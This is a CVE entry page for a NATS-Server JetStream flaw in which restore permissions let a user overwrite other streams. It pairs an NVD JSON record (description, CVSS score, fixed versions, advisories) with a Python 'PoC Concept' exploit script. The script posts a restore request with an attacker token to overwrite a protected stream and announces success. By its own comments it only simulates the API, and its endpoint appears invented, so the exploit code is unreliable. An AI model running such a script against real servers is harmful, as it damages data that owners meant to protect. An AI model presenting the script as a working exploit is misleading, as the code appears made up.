CVE-2026-33222

# PoC Concept for CVE-2026-33222 # This script demonstrates the logic flaw where a user with restore permissions # can restore data to an arbitrary stream name. import requests import json # Configuration NATS_API_URL = "http://target-nats-server:8222/js/v1/stream" AUTH_HEADER = {"Authorization": "Bearer <attacker_jwt_token>"} # Legitimate source stream the attacker has access to source_stream = "ATTACKER_OWNED_STREAM" # Target stream the attacker wants to overwrite (Impacted data) target_stream = "PROTECTED_TARGET_STREAM" # Payload to restore data (Simulating the API call structure) payload = { "stream_name": target_stream, # Vulnerability: The target is not validated against permissions "restore_action": "full_restore", "source": source_stream } print(f"[*] Attempting to restore data from '{source_stream}' to restricted stream '{target_stream}'...") try: # The endpoint might differ depending on specific NATS configuration response = requests.post(f"{NATS_API_URL}/{source_stream}/restore", headers=AUTH_HEADER, json=payload) if response.status_code == 200: print("[+] Exploit successful! Data restored to unauthorized stream.") print(f"[+] Response: {response.json()}") else: print(f"[-] Request failed (Status: {response.status_code})") print(f"[-] Response: {response.text}") except Exception as e: print(f"[!] Error during exploit execution: {e}")

{"cve": {"id": "CVE-2026-33222", "sourceIdentifier": "[email protected]", "published": "2026-03-25T21:16:47.237", "lastModified": "2026-03-26T17:17:38.877", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "NATS-Server is a High-Performance server for NATS.io, a cloud and edge native messaging system. Prior to versions 2.11.15 and 2.12.6, users with JetStream admin API access to restore one stream could restore to other stream names, impacting data which should have been protected against them. Versions 2.11.15 and 2.12.6 contain a fix. As a workaround, if developers have configured users to have limited JetStream restore permissions, temporarily remove those permissions."}, {"lang": "es", "value": "NATS-Server es un servidor de alto rendimiento para NATS.io, un sistema de mensajería nativo de la nube y del borde. Antes de las versiones 2.11.15 y 2.12.6, los usuarios con acceso a la API de administración de JetStream para restaurar un stream podían restaurar a otros nombres de stream, lo que afectaba a los datos que deberían haber estado protegidos contra ellos. Las versiones 2.11.15 y 2.12.6 contienen una corrección. Como solución alternativa, si los desarrolladores han configurado a los usuarios para tener permisos limitados de restauración de JetStream, eliminen temporalmente esos permisos."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-285"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:linuxfoundation:nats-server:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.11.15", "matchCriteriaId": "13EA156E-2759-4586-A22E-CDEAAD4D610C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:linuxfoundation:nats-server:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.12.0", "versionEndExcluding": "2.12.6", "matchCriteriaId": "4E347CFB-C56D-4FD8-8DD8-3D34C08D7154"}]}]}], "references": [{"url": "https://advisories.nats.io/CVE/secnote-2026-12.txt", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}, {"url": "https://github.com/nats-io/nats-server/security/advisories/GHSA-9983-vrx2-fg9c", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}